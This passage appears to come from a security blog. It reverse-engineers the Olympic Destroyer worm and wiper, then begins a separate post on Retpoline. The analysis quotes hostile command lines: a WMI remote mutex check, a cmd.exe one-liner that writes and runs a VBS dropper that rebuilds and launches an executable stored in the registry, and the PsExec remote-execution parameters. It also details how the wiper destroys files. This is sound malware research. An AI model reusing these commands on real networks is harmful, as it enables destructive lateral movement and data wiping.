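    (count,) = struct.unpack_from("<H", blob, pos)
    pos += 2
    creds = []
    for _ in range(count):
        ulen, plen = struct.unpack_from("<HH", blob, pos)
        pos += 4
        user = blob[pos:pos + ulen]
        pos += ulen
        password = blob[pos:pos + plen]
        pos += plen
        creds.append((user, password))
    return creds


# Hypothetical sample data, embedded in some surrounding bytes like in a PE file
sample = [(b"EXAMPLE\\alice", b"secret1"), (b"EXAMPLE\\bob", b"secret2")]
blob = b"\x00" * 32 + serialize_credentials(sample) + b"\xff" * 8
print(parse_credentials(blob))
```

A parser along these lines is what makes it possible to compare the credential lists of different samples later on.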

In our case there are 0x2C stolen credentials. The first block of credentials has a _username\domain_ string of 0x1B bytes length and has a password of 0x0C bytes length. Then the second block of credentials follows, and so on.

Once Olympic Destroyer has located the array in its buffer, the array is written over with the serialized version of the current credentials vector of the config object. Then the executable modified in memory is written back to disk in the %tmp% directory. In other words: The list of credentials, which was present when Olympic Destroyer was executed first, is now updated with all credentials stolen during runtime.

RESOURCE 104 AND 105 – PREPARING THE NEXT STEPS

After updating a copy of itself with all stolen credentials, the execution flow returns to the main function where two consecutive calls to 0x00403F30 prepare the network spreading algorithm and the destructive parts. Both calls take a resource name as a first parameter for input and return a string with a path to a file. In this function Olympic Destroyer takes the same decryption algorithm as previously described and decrypts the resources 104 and 105. Both files are not yet executed but written to disk with a random filename in the %tmp% folder.

Resource 104 is a simple copy of the well-known tool “PsExec” which can be used to execute commands and files on remote computers. It will come into play when I describe the lateral movement. Resource 105 though is the actual “Destroyer” of Olympic Destroyer.

STARTING THE DESTROYER – FULFILLING THE REAL PURPOSE

After writing resource 104 and 105 to %tmp%, the function at 0x00404220 is called with the path to resource 105 as an argument. Here nothing magical happens. The file from the resource is simply executed without a visible window/console and the function returns:

[Figure: Starting an invisible process]

From here on the destroyer from resource 105 is running. It has its own chapter later on.

LATERAL MOVEMENT

Once the destroyer part of Olympic Destroyer has been started in its own process, the main function calls 0x00406ED0 to start the network spreading routine.

At first two sanity checks are made by calling _GetFileAttributesA_ in order to ensure that PsExec from resource 104 and the copy of Olympic Destroyer with the updated credentials list in the %tmp% folder exist. If both checks pass, a list of potential targets within the local network is built:

With a call to 0x00406DD0 Olympic Destroyer utilizes the _GetIpNetTable_ API to enumerate all IPv4 addresses of the current ARP cache, thus getting all IP addresses the local machine had access to – considering ARP cache timeouts which can remove older entries, of course.

The list of IPv4 addresses is then passed to the function at 0x004054E0, along with a pointer to the config object as well as the path to PsExec and the updated copy of Olympic Destroyer in the %tmp% folder. I think it is noteworthy that passing both paths to the files in %tmp% is completely superfluous, since they are already a part of the config object, which is also passed as argument.

The function at 0x004054E0 is the heart of the spreading algorithm: First, it reads the updated copy of Olympic Destroyer into memory. Then it initializes a new structure with all information passed as arguments as well as some additional information, which is somehow not really used later on. After that it calls 0x00407680, where the spreading in the network begins: For each IP address, a new thread is spawned, which starts at 0x00407D40. This thread then loops over all credentials of the config object, trying to use WMI via COM objects in order to infect remote computers:

[Figure: Remote command execution]

The first important function for that is at 0x004045D0 (called _executeRemoteCmdline_), which gets one IP and one pair of credentials as input, as well as one command line to execute on the target machine – _outPtr_ is used to transport the return value. The whole function is a mess of COM calls, but I’ll try to explain their meaning anyways. Words in italic are quotes from the binary:

This function creates a COM object of _CLSID {4590F811-1D3A-11D0-891F-00AA004B2E24}_ and _IID {dc12a687-737f-11cf-884d-00aa004b2e24}_ in order to remotely execute WMI commands. Then a connection to _\\\root\CIMV2_ is created and the credentials are applied by calling _CoSetProxyBlanket_. With the class _Win32_Process_ and the function _Create_ a _Commandline_ is executed on the remote computer. With “_Select * From Win32_ProcessStopTrace_” the event for the termination of the remote process is registered in order to read its _ExitStatus_ code afterwards.

The executed command line is rather simple:

_“cmd.exe /c (ping 0.0.0.0 > nul) && if exist %programdata%\\evtchk.txt (exit 5) else ( type nul > %programdata%\\evtchk.txt)”_

With the execution of _ping_ a short delay is introduced, since the execution waits for _ping_ to fail four times to ping the address _0.0.0.0_. Then, in case the file _%programdata%\evtchk.txt_ exists on the target system, the execution returns the exit code five. Otherwise said file is created and the execution finishes with its default exit code of zero.
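The check-or-create logic of that command line can be emulated locally with a short Python sketch. This is not how the malware runs it (that happens remotely via WMI and _cmd.exe_); the sketch only mirrors the decision “marker exists: exit code five, otherwise create it and exit with zero”. The function name and the temporary directory standing in for %programdata% are assumptions for illustration.

```python
import os
import tempfile

EXIT_MARKER_PRESENT = 5  # exit code used when evtchk.txt already exists


def check_or_create_marker(marker_path: str) -> int:
    """Return 5 if the marker file exists, else create it empty and return 0."""
    if os.path.exists(marker_path):
        return EXIT_MARKER_PRESENT
    with open(marker_path, "w"):
        pass  # equivalent of "type nul > file": create an empty file
    return 0


# A temporary directory stands in for %programdata% on the target
with tempfile.TemporaryDirectory() as fake_programdata:
    marker = os.path.join(fake_programdata, "evtchk.txt")
    first = check_or_create_marker(marker)   # marker is created
    second = check_or_create_marker(marker)  # marker is found
    print(first, second)
```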

The return value of the remote command line is then read and is returned via _outPtr_ as a function argument from 0x004045D0. Interestingly the _outPtr_ is only written to in case of a successful remote execution. All error cases leave the _outPtr_ untouched. As the memory address of the target of _outPtr_ is initialized with zeros, the caller of 0x004045D0 is unable to distinguish between an error during the remote code execution (e.g. because of false credentials or an unavailable IP) and the successful write of the _%programdata%\evtchk.txt_ file on the remote machine. ¯\_(ツ)_/¯

At 0x00404C30 the second interesting function (called _writeFileToRemoteRegistryAndExecuteCommandlineVbs_) is located. It takes the target IP address as well as the credentials as input. It is very similar to the function 0x004045D0 described previously. The main difference is that by using the _StdRegProv_ class and the function _SetBinaryValue_ a registry key in _HKEY_CURRENT_USER\Environment_ with the name _Data_ is created on the remote computer. The value of the registry key is an executable file, but interestingly it is not the copy of Olympic Destroyer with the updated credential list in %tmp%, as I would have expected, but it is the binary which is currently executed and thus does not contain any of the current system’s credentials:

[Figure: The remote spreading algorithm spreads the wrong binary]

After the binary is written to the remote registry, the function at 0x00404C30 calls the function at 0x004044B0. Here the function _Create_ of the COM class _Win32_Process_ is used to remotely execute another command line. This command line is already known from the Talos blog post. For readability I pretty-printed the commands:

> _cmd.exe /c_
> _(_
> _echo strPath = Wscript.ScriptFullName_
> _& echo.Set FSO = CreateObject^(\”Scripting.FileSystemObject\”^)_
> _& echo.FSO.DeleteFile strPath, 1_
> _& echo.Set oReg = GetObject^(\”winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\default:StdRegProv\”^)_
> _& echo.oReg.GetBinaryValue ^&H80000001, \”Environment\”, \”Data\”, arrBytes_
> _& echo.Set writer = FSO.OpenTextFile^(\”%ProgramData%\\%COMPUTERNAME%.exe\”, 2, True^)_
> _& echo.For i = LBound^(arrBytes^) to UBound^(arrBytes^)_
> _& echo.s = s ^& Chr^(arrBytes^(i^)^)_
> _& echo.Next_
> _& echo.writer.write s_
> _& echo.writer.close_
> _) > %ProgramData%\\_wfrcmd.vbs && cscript.exe %ProgramData%\\_wfrcmd.vbs && %ProgramData%\\%COMPUTERNAME%.exe_

The first set of _echo_s outputs parts of a VB script, which are then written to _%ProgramData%\_wfrcmd.vbs_ by using the redirect operator “>”. Afterwards this file is executed via the _cscript_ interpreter before the executable _%ProgramData%\%COMPUTERNAME%.exe_ is executed. This executable is created during the runtime of the newly created VB script, which basically just reads the executable stored in _HKEY_CURRENT_USER\Environment\Data_ and writes it to _%ProgramData%\%COMPUTERNAME%.exe_.

Back in 0x00405170, the function at 0x004045D0 (_executeRemoteCmdline_) is called a second time. This time it removes the file _%programdata%\evtchk.txt_, which was previously checked or created on the remote computer, by executing the command line “_del %programdata%\evtchk.txt_”.

To state the obvious, in case it got lost in all the text: _%programdata%\evtchk.txt_ is intended as a mutex object on the remote computer, which marks that a remote infection is currently ongoing. This prevents two computers running Olympic Destroyer’s infection routine from infecting the same target at the very same time. Yet, as this file is deleted right after the infection, it does not avoid multiple infections of the same target in general, but only in parallel.

While all previously mentioned remote infection threads are running, the main thread waits for their termination by calling _WaitForMultipleObjects_, where it waits for all spawned threads to finish.

Once all threads are finished and back in the function 0x00406ED0, the control flow enters a loop, which iterates over all credentials and passes them to the function at 0x00406780. This function also has the purpose of enumerating network targets. Once again COM objects are involved:

One main part of this function is the call to _NetGetDCName_, which gets the name of the primary domain controller. This name is formatted into the string “_%s\\root\\directory\\LDAP_” in order to use it with the same COM objects as before during the remote code execution (_CLSID {4590F811-1D3A-11D0-891F-00AA004B2E24}_ and _IID {dc12a687-737f-11cf-884d-00aa004b2e24}_) by using the credentials, which are passed as function arguments. If everything works so far, the statement “_SELECT ds_cn FROM ds_computer_” is executed in order to get all computer names from the current domain. Then, for each computer, by calling _GetAddrInfoW_ and _ntohl_ the domain names are resolved to IPs. A vector of IPs is returned from 0x00406780.

The IPs are then passed to the already known function at 0x004054E0 in order to infect those computers remotely. When this IP enumeration and remote infection loop is finished, some objects and memory are cleaned up before the control flow returns to the main function.

SELF-DELETION – OR HOW TO HIDE YOUR TRACES, WELL, AT LEAST ONE OF THE MANY…

The last step in the main function, before freeing the remaining objects and memory, is the call to the already described function “selfDeleteInjectBinary” at 0x00405DD0. This time the sleep interval is only three instead of five seconds. So the spawned process tries to wipe the binary of the parent process every three seconds until it succeeds. The control flow of Olympic Destroyer then leaves the _main_ function and the process exits, which will make the wiping of the binary possible. I think it is noteworthy that none of the other dropped files are deleted. Everything in %tmp% remains and also all infection markers described previously are still there.

THE DESTROYER

A big part of this component’s functionality can be described in one picture by looking at the main function:

[Figure: Destroyer main function]

After giving itself the _SeShutdownPrivilege_ and bluntly ignoring all potential erroneous API calls, the Destroyer calls the function at 0x00401000 (“_execProcAndWaitForTerminate_”) five times in a row in order to:

* Delete all shadow copies without prompt to avoid restoring the system
* Silently delete all backups created by the tool _wbadmin_
* Ignore all failures during boot and avoid starting the recovery mode
* Clear system logs
* Clear security logs

Then the function at 0x004012E8 (“deactivateAllActiveServices”) is called. The name in the screenshot is already a spoiler of the actual functionality: All services of the local computer are disabled. This is done by iterating over all possible types of services by calling _EnumServicesStatusW_ with the _dwServiceType_ parameter set to _0x13F_ and _dwServiceState_ to _SERVICE_STATE_ALL_, and then calling _ChangeServiceConfigW(SERVICE_DISABLED)_ for each service. In combination with the previously disabled recovery mode and deleted backups, this bricks the local system on the next boot.

Back in the main function a thread is spawned which executes the function 0x004016BF (“wiperThread”). The main thread then sleeps for a fixed single hour before shutting down the system – no matter what the wiper thread did or didn’t do in the meantime. Note that this might also interrupt the spreading routine of Olympic Destroyer, which might still run.

The first thing the wiper thread does is set its own thread priority to _THREAD_PRIORITY_TIME_CRITICAL_ in order to get as many CPU cycles as possible. Then it recursively iterates over all available network resources with the APIs _WNetOpenEnumW_ and _WNetEnumResourceW_. Each available resource is temporarily mounted by calling _WNetAddConnection2W(CONNECT_TEMPORARY)_, yet the parameters for the username and password are set to zero, thus the current user’s credentials are used. It is important to note that the stolen credentials are not used here. This decouples the Destroyer logically from its parent process.

For each successfully mounted resource the function at 0x00401441 is called.

This function is also best described with a screenshot:

[Figure: Remote wiping functionality]

This function simply iterates recursively over all folders, starting at the mountpoint which is provided as an argument, and then destroys each single file that it finds:

* Files of 1MB or less in size are completely written over with zeros
* For files bigger than 1MB only the first 4096 bytes are nulled. Yet for most files this should be enough to render them useless

The wiper thread does not communicate with the main thread and there is no synchronization in any way. No matter if the wiping already finished or not, the system is shut down after one hour. It might be a simple mistake to shut the system down after a fixed time: The wiping may not have wiped everything it can reach, or it could have already finished and the local computer is still useable until the shutdown. Additionally the remote spreading could still be ongoing.
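The size-dependent rule from the list above can be expressed as a small Python sketch, which is handy for estimating how much of a given file is lost. It operates on in-memory buffers only and touches no files. The assumption here is that “1MB” means 1024 * 1024 bytes; the constant and function names are made up for this illustration.

```python
SMALL_FILE_LIMIT = 1024 * 1024  # assumption: "1MB" is 1 MiB
HEADER_BYTES = 4096             # bytes nulled at the start of bigger files


def bytes_to_zero(file_size: int) -> int:
    """Return how many leading bytes get nulled for a file of this size."""
    if file_size <= SMALL_FILE_LIMIT:
        return file_size  # small files are overwritten completely
    return HEADER_BYTES   # big files only lose their first 4096 bytes


def apply_to_buffer(data: bytes) -> bytes:
    """Show the effect of the rule on an in-memory copy of a file."""
    n = bytes_to_zero(len(data))
    return b"\x00" * n + data[n:]


small = apply_to_buffer(b"A" * 10)
big = apply_to_buffer(b"A" * (SMALL_FILE_LIMIT + 1))
print(small == b"\x00" * 10, big[:HEADER_BYTES].count(0), len(big))
```

For big files the remaining content stays on disk, so partial recovery of such files may be possible even though their headers are gone.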

Yet, I think it is more likely that this feature is a well-planned and sophisticated time bomb: Imagine Olympic Destroyer spreading through a network, wiping all it could wipe for one hour, when suddenly one system after another shuts down and is unable to boot.

DIFFERENT TYPES OF OLYMPIC DESTROYER

As mentioned in the introduction, I found two different types of Olympic Destroyer. The simpler type was described previously. The second type has the very same functionality, it only adds a few more functions. Those additional functions have the purpose of extending the spreading functionality of Olympic Destroyer by leveraging _PsExec_, which was written to %tmp% but then ignored by the simpler version.

USING PSEXEC

The additional function call is placed right after writing/checking the file _%programdata%\evtchk.txt_ and before the spreading function which uses COM objects and spreads the version of Olympic Destroyer which was not updated with the stolen credentials. This bugged behavior of spreading the wrong binary over COM exists in both versions.

The additional call to PsExec is done in the following way:

[Figure: Format string for calling PsExec]

PsExec is started with several parameters:

* The first three parameters identify the target computer and the credentials which are applied
* Then the dialogue to confirm the EULA of PsExec is skipped with “accepteula”
* “-d” runs PsExec in a non-interactive way, which means that the caller does not wait for PsExec to terminate
* With “-s” the remote process is started with System rights (in case the credentials allow that)
* “-c” and “-f” specify that the actually executed file is copied to the target computer and overwritten in case it already exists
* The last parameter is the remotely executed file, which is obviously Olympic Destroyer

This time the remotely executed binary is the copy of Olympic Destroyer in %tmp%, which was updated with the credentials stolen during the current run. The output buffer returned from PsExec is parsed for the string “started”, which indicates to Olympic Destroyer that its call was successful. A successful remote infection using PsExec breaks the loop which iterates over the credentials for a fixed target computer. Thus the target is only infected once and the bugged COM infection is avoided.

A CRIPPLED WORM AND A CAPABLE WORM

The simple version of Olympic Destroyer has some spreading functionality, although it is broken in the sense that the wrong binary is spread through the network. By not spreading the updated version of Olympic Destroyer, which contains the credentials stolen during the run, it loses a crucial part of its spreading capability: Assume we have a computer “A” with a logged in user who has the rights which allow remote spreading of Olympic Destroyer. And a computer “B”, which is in reach of A, but where no user is logged in. A third computer “C” is only reachable over B but not over A. If the simple version of Olympic Destroyer is executed on computer A, it will use the stolen credentials to infect computer B. But on computer B there are no credentials to steal, so it won’t be able to infect computer C.

In other words: The simple version of Olympic Destroyer can only spread to computers which are “one hop” in distance. Yet, in most cases this should still be enough to infect a whole network, since a central Domain Controller is usually connected to most computers in the network.

Spreading the more advanced version including the stolen credentials gives Olympic Destroyer even better worming capabilities, since it gathers more and more credentials as it spreads further and further through a network.

In the previous example computer C could be infected from computer B by using the credentials stolen on computer A.

CRUNCHING SOME NUMBERS

In order to verify my findings with the two versions of Olympic Destroyer, I grabbed 36 different samples which are identified as Olympic Destroyer and compared their sets of stolen credentials. One sample had an empty list of credentials, so I discarded it.

It turns out that 23 of those samples are from the simple version type. All of them contained the same set of credentials, which were already described by Talos. They are for the domains _g18.internal_ and _Pyeongchang2018.com_. All of the samples contained additional credentials stolen from various sandbox systems and virtual machines of researchers, who probably uploaded the files from the %tmp% folder to Virus Total during their analysis. I could not find a single sample which contained only a subset of the credentials stolen from the _g18.internal_ and _Pyeongchang2018.com_ domains. If you strip the credentials from sandboxes and researchers, all 23 samples contain the same set of credentials. This supports the finding that the simple version of Olympic Destroyer has a broken spreading algorithm.

In contrast to that, 12 samples of the total 36 are from the ATOS network with the domain _ww930_, as partially described by Kaspersky. Apparently the more capable version of Olympic Destroyer was spreading here, thus the differences in the lists of credentials are bigger. The first pair of credentials in this set can be found in all 12 samples. But the rest of the credentials are a mix stolen from different computers in the same network. We can see that the worm took different paths when spreading through the network, acquiring the credentials of at least five different computers. After removing the credentials from researchers and sandboxes, we are left with five unique sets of credentials. If one subset of credentials is one letter, the sets can be described as A, AB, AC, AD and ADE. This shows that the more capable version of Olympic Destroyer actually passes its list of stolen credentials on to the infected systems.
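The relation between the five sets can be made explicit with a small Python sketch: for every observed set it looks for the largest other set that is fully contained in it, which is a plausible candidate for the list the sample inherited. This is only an illustration of the reasoning, not a tool used in the analysis; a subset relation is consistent with inheritance but does not prove an infection path. The function name is hypothetical.

```python
def infer_parents(credential_sets):
    """Map each set to its largest proper subset among the observed sets."""
    parents = {}
    for current in credential_sets:
        # "<" on frozensets tests for a proper subset
        candidates = [other for other in credential_sets if other < current]
        parents[current] = max(candidates, key=len) if candidates else None
    return parents


# One letter stands for one subset of credentials, as in the text
observed = [frozenset(s) for s in ("A", "AB", "AC", "AD", "ADE")]
parents = infer_parents(observed)

for child in observed:
    parent = parents[child]
    child_name = "".join(sorted(child))
    parent_name = "".join(sorted(parent)) if parent else "(initial set)"
    print(child_name, "<-", parent_name)
```

Read this way, A is the initial list, AB, AC and AD each add the credentials of one further machine, and ADE extends AD by one more hop.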

The samples in question are:

* 1942f14326f8ffa3afc83946ba9ec06abe983a211939f0e58362f85dd2a6b96a
* 25089ec24167f3caa413a9e1965c7dfc661219f45305187070a1e360b03f869c
* 6d7d35b4ce45fae4a048f7e371f23d1edc4c3b6998ab49febfd7d33f13b030a5
* 9085926d0beacc97f65c86c207fa31183c5373e9a26fb0678fbcd26ab65d6e64
* 90c956e8983116359662f8b82ae156b378d3fae02c07a18827b4c65f0b5fe9ef

It is likely that there are more samples out there which give a better picture of the way Olympic Destroyer wormed itself through the ATOS network.

PE TIMESTAMPS

As the blog article of Kaspersky has already shown, the author(s) of Olympic Destroyer had quite some fun planting false flags. So, the compilation time stamps of the PE files should be taken with a grain of salt, as they can be easily forged. Nonetheless they provide an interesting picture.

Simple version of Olympic Destroyer, PE time stamps ordered ascending:

| Name | Compilation Time Stamp | Description |
| --- | --- | --- |
| Resource 104 | 2016-06-28 18:43:09 | Copy of PsExec |
| Resource 105 | 2017-12-27 09:03:48 | Destroyer |
| DLL in Resource 101 | 2017-12-27 11:44:17 | Browser Password Stealer |
| DLL in Resource 102 | 2017-12-27 11:44:21 | Windows Account Password Stealer |
| Resource 101 | 2017-12-27 11:44:30 | Loader for internal DLL |
| Resource 103 | 2017-12-27 11:44:35 | Loader for internal x64 DLL |
| Resource 102 | 2017-12-27 11:44:40 | Loader for internal DLL |
| Main binary | 2017-12-27 11:44:47 | Olympic Destroyer |

(Note that I did not extract the time stamp for the DLL in the resource of resource 103.)

The PE time stamps of the more complex version in ascending order:

| Name | Compilation Time Stamp | Description |
| --- | --- | --- |
| Resource 104 | 2016-06-28 18:43:09 | Copy of PsExec |
| Resource 105 | 2017-12-27 09:03:48 | Destroyer |
| DLL in Resource 101 | 2017-12-27 11:38:53 | Browser Password Stealer |
| DLL in Resource 102 | 2017-12-27 11:38:58 | Windows Account Password Stealer |
| Resource 101 | 2017-12-27 11:39:06 | Loader for internal DLL |
| Resource 103 | 2017-12-27 11:39:11 | Loader for internal x64 DLL |
| Resource 102 | 2017-12-27 11:39:17 | Loader for internal DLL |
| Main binary | 2017-12-27 11:39:22 | Olympic Destroyer |

Some of those values actually make sense, although they might have been crafted in order to do so. The DLLs which are resources of resource 101 and 102 have to be compiled before they can be embedded as resources, so their time stamps come first. The same goes for all resources which are embedded in the main binary of Olympic Destroyer. PsExec in resource 104 is the original copy of PsExec, thus has the original time stamp.

A time difference of four to nine seconds for each binary sounds realistic, given only a few dependencies on external libraries. Unfortunately, the compilation with the biggest external dependencies, the DLL in resource 101 where SQLite is used, seems to be the first binary in the build chain. This is where I would have expected to see the biggest gaps in between the time stamps. But as it is the start of the build chain, we cannot compare it to any binary built before it.

By looking at the gaps, we can also see that everything except the destroyer part seems to have been compiled in one block. Also the more complex version of Olympic Destroyer seems to have been compiled five minutes before the simpler version. Most probably the attacker(s) just compiled the first set of Olympic Destroyer, before commenting out the one function using PsExec (implicitly removing all the used sub-functions), and then recompiled the whole set. It is worth pointing out that both versions of Olympic Destroyer use the very same copy of the destroyer component. Not only are the compilation time stamps the same, but also their hash sums.
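The gaps discussed above can be recomputed from the two tables with a few lines of Python. The time stamps are copied from the tables; the variable and function names are made up for this sketch, and it only covers the six binaries that were built in one block.

```python
from datetime import datetime

FMT = "%Y-%m-%d %H:%M:%S"

# Build-chain time stamps from the two tables (without PsExec and the destroyer)
SIMPLE = [
    "2017-12-27 11:44:17",  # DLL in Resource 101
    "2017-12-27 11:44:21",  # DLL in Resource 102
    "2017-12-27 11:44:30",  # Resource 101
    "2017-12-27 11:44:35",  # Resource 103
    "2017-12-27 11:44:40",  # Resource 102
    "2017-12-27 11:44:47",  # Main binary
]
COMPLEX = [
    "2017-12-27 11:38:53",  # DLL in Resource 101
    "2017-12-27 11:38:58",  # DLL in Resource 102
    "2017-12-27 11:39:06",  # Resource 101
    "2017-12-27 11:39:11",  # Resource 103
    "2017-12-27 11:39:17",  # Resource 102
    "2017-12-27 11:39:22",  # Main binary
]


def gaps_in_seconds(stamps):
    """Return the differences between consecutive time stamps in seconds."""
    times = [datetime.strptime(s, FMT) for s in stamps]
    return [int((b - a).total_seconds()) for a, b in zip(times, times[1:])]


simple_gaps = gaps_in_seconds(SIMPLE)
complex_gaps = gaps_in_seconds(COMPLEX)
# Offset between the main binaries of the two builds
build_offset = int(
    (datetime.strptime(SIMPLE[-1], FMT) - datetime.strptime(COMPLEX[-1], FMT)).total_seconds()
)

print("simple: ", simple_gaps)
print("complex:", complex_gaps)
print("offset between main binaries (s):", build_offset)
```

All gaps fall between four and nine seconds, and the main binaries are 325 seconds apart, which matches the “five minutes” mentioned above.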

SUMMARY

This article has shown the innermost workings of the malware called Olympic Destroyer. We have seen that by pure reverse engineering of the malware samples, a plethora of information can be obtained and deduced.

The analysis indicates that Olympic Destroyer consists of two completely independent parts: The first one is a framework for network spreading, using resources 101 to 104 in order to spread as fast and as far as possible in the local network. The second one is the destructive component. Both parts work completely independently of each other. Resources 101 to 103 have a strong logical dependency on the main binary, as they receive the decryption key as well as the name of the named pipe as arguments. And the main binary depends on the information returned from resources 101 to 103 being formatted in a certain way. In contrast to that, the destroyer in resource 105 is only dropped and executed in a fire-and-forget manner. No arguments, return values or status codes are exchanged. So I think it is correct to state that everything except the destroyer is merely a vehicle, in the form of a spreading framework, to deliver a payload. And the delivered payload is the destroyer. In theory, any other payload could be delivered by simply exchanging resource 105.

We have also seen that Olympic Destroyer comes in two different versions, which have been spread in two different networks. The spreading algorithm differs in that, in one version, credentials stolen on one system are not carried on to the next infected system. It is unknown to me why the differences exist. Reading the Kaspersky article indicates that the attackers already had a strong foothold in the _g18.internal_ and _Pyeongchang2018.com_ network. So it might have been enough to spread only one hop from the initially infected machine. This decision could also have been influenced by the defensive mechanisms employed in the targeted network. A proper network monitoring tool should mark the execution of PsExec as a red flag, which might have been the reason to remove this part of the spreading algorithm.

The analysis of stolen credentials in the network of _ATOS_ indicates that the attackers had a weaker foothold in that network, since, judging by the samples I looked at, only two sets of credentials were stolen on the initial infection (compared to 44 in the simpler variant). All other credentials were added during the spreading in the network. This weak foothold might have been the reason to go with a more aggressive spreading algorithm.

APPENDIX

Config structure as used in Olympic Destroyer:

> _struct config_

> _{_

> _DWORD credentialsVectorStart;_

> _DWORD credentialsVectorEnd;_

> _DWORD credentialsVectorMaxSize;_

> _CRITICAL_SECTION critSect;_

> _WSADATA wsadata;_

> _char ressourceHpath;_

> _char randomTempPath;_

> _char ressourceIpath;_

> _char selfModulePath;_

> _char domainName;_

> _char accountName;_

> _char domainAndAccountName;_

> _char v13;_

> _DWORD bitness;_

> _DWORD bVersionGreaterEqualVista;_

> _DWORD bVersionSmallerEqualXP;_

> _DWORD bHasSelfDebugPrivs;_

> _DWORD bIsServiceOrAdmin;_

> _DWORD bIsUserAccount;_

> _};_

Hashes used for analysis:

> _edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9_

> _01e640a91d32230cd3f45e1594177393415585dbeba9ddbd31be2139935058d3_

> _137148fe8223bc88661ac941ea1a648ad0fb6e49c359acd06781abd0a0493c01_

> _1942f14326f8ffa3afc83946ba9ec06abe983a211939f0e58362f85dd2a6b96a_

> _2239d109d7c01682c99a721d654643b7d8f4431887ecad6fb2d043dbdacfe226_

> _25089ec24167f3caa413a9e1965c7dfc661219f45305187070a1e360b03f869c_

> _254fbeb13f8d2dc36de3a3ffca653608d1b3420a20a20248d330500785b3945c_

> _2bcbb1c165a6e31e085306224de3410249df50742ca3af069d58c7fd75d2d8c4_

> _2bf9f3703b48bf1578a43479444107b33ff6ecea108b364fc73913a639c511d4_

> _2c28f3b297a990b9d7a7163bac57ab68228c66109bb7a593702e556cdd455cce_

> _3131a8208dc7441bf26592d7fed2ba5d9f9994e21d9b8396b4d2cda76a8a44d7_

> _36a65a47cc464aac45a5d27372ea3b3584726d354f0792b9a77bfbe0cd0558bd_

> _41a6d6f1dca75abc924960ee701b0df0e7adc8b7501ac4e2c00743d7266df7d3_

> _5181fe760f456719b0ec505370df0b38055a5a3b202e1d50948fc92383a61c18_

> _569fbe4f66fa09fb375fb87915da79dbafb1ef62d9a20849d1beea4eadb8e805_

> _5d85fba3ff021b35bfba30d5d56b957ef084d818778ff77550bcf65755aa7849_

> _5f37829988e827f05b42774db94e8a15e87e9de12e61b89c91bf5fddee90650c_

> _6d7d35b4ce45fae4a048f7e371f23d1edc4c3b6998ab49febfd7d33f13b030a5_

> _6f6e9dde888d2368c1c9973769a5ea76bbf634105ed4f8adf1e74624f39454ad_

> _725efe161b8d0024cd330e3a3da194b46d16be14d57392fbfdf1ea71415d67b1_

> _75fa1309be8fdca4a6df345a009b47938503d5227149838334581b08d40b7e2f_

> _9085926d0beacc97f65c86c207fa31183c5373e9a26fb0678fbcd26ab65d6e64_

> _90c956e8983116359662f8b82ae156b378d3fae02c07a18827b4c65f0b5fe9ef_

> _98d4f0e8f91d7f4f1a3058b1a30220e3460cc821be704acfcb7fa2eb0c88818c_

> _99ca9d41c2ea6a18436fbc173ce8f3e94b5a3d592d9e4fa978120d140d96aefa_

> _a9f66d9dd3fd0f977381e83c1379fe664f22ebdd5695258fc388465cd3749562_

> _af33d399d9cb8026d796daf95f5bda9da96bb021ad93c001a21aa38005f2faa7_

> _b30b4acf05898c8a6338f5df6c3df7d7f06df8e67ccd773ffd83b5b8acff4cb8_

> _bdfb1a9f59be657b5375689b357ef8e70e1e7332f52c2e79ab3be796e06858d1_

> _ca8be57bbd2f3169d0c1c4b5145e8f955ea69ddde701f94a2b29c661389b3aa2_

> _cc2b47bffc260d992c602dbdbce1fb2ed982df883956cad9beac1ee0784650f6_

> _d17d32048aae06ec60b693cd83e1cf184e8c2e4d1f0299a28423fdc624f56bb8_

> _d2e43c41acd40324813d51df99fa127b86d8e384671dcc77f748d86afc3993a5_

> _e2153c73ec9fd15dc8389523515a96c3477fce5503be78ff82ab3cc7e9386e83_

> _e4dd30d5d85c4aaf05e01d8f40fb0e01e4e8ba99e82ec58946c045ce53783bde_

> _e8349cfcc422310c259688b0226cb14f5196a6daad77b622405282aeac89ab06_

> _f99610f8e36eb65e75979ef3ea4b7382bfb0bf2b72191cefccaaa19283d23606_

Author Robert Michel Posted on March 28, 2018


IN DEBT TO RETPOLINE

The appendix was added on the 14th of February 2018, in response to comments made to me on Twitter. In this connection, “retpoline pause lfence” and “retpoline ud2” were added to the table. Other than that, only typos were fixed since the original post.

ABSTRACT

In this blog post I explore the Retpoline mitigation that Paul Turner of Google suggested for the Spectre indirect branch variant issue. A short differential side channel analysis is made along with a performance analysis. The impact of the use of a pause instruction in retpoline is discussed. Finally, I consider the technical debt that a widely deployed retpoline imposes on CPU developers.

HOW DOES RETPOLINE WORK

This section follows the Google presentation of retpoline closely. I included it because it provides the context for the remainder of this blog post. A jmp rax is turned into the following code:

* (1) call set_up_target;

* (2) capture_spec:

* (3) pause;

* (4) jmp capture_spec

* (5) set_up_target:

* (6) mov [rsp],rax

* (7) ret;
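To make the two paths of this listing concrete, here is a toy model in Python. It is only a sketch under simplifying assumptions: the RSB and the program stack are modeled as plain lists, speculation is reduced to "which address does the ret predict", and the function name `run_retpoline` is invented for this illustration.

```python
def run_retpoline(target):
    """Toy model of the listing: return (speculative, architectural) targets of the ret."""
    rsb = []    # return stack buffer: CPU-internal, only used to predict returns
    stack = []  # program stack: decides where the ret really goes

    # (1) call set_up_target: the return address (capture_spec) is pushed
    # to the RSB and to the program stack.
    rsb.append("capture_spec")
    stack.append("capture_spec")

    # (6) the mov: overwrite the return address on the program stack only.
    # The RSB entry is not touched by an ordinary store.
    stack[-1] = target

    # (7) ret: predicted from the RSB, resolved from the program stack.
    speculative = rsb.pop()
    architectural = stack.pop()
    return speculative, architectural


if __name__ == "__main__":
    spec, arch = run_retpoline("original_target")
    print("speculative path goes to:  ", spec)
    print("architectural path goes to:", arch)
```

In this model the prediction always lands in capture_spec, while the architectural result is the original branch target, which is the property the following explanation relies on.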

call set_up_target (1) pushes the address of capture_spec (2) to the return stack buffer (RSB, a CPU-internal buffer used to predict returns). It also pushes the address of capture_spec (2) to the program stack and transfers control to set_up_target (5). The mov in line 6 overwrites the return address on the program stack, so that the subsequent return will pop the stack and go to the original target on its architectural path. The speculative path of the return remains the value from the RSB, and thus the CPU will speculatively execute the code starting at (2). The pause instruction is meant to relinquish pipeline resources to co-located hyperthreads and to save power if no co-located hyperthreads are present. The jmp in line 4 continues to repeat the pause until the speculative execution is rolled back when the ret in line 7 finishes executing. In simple terms this means the speculative path resolves to a spinlock and thus does not leak any information through a side channel. The architectural path will eventually resolve correctly and the program will run as it is supposed to.

SIDE CHANNEL ANALYSIS OF RETPOLINE

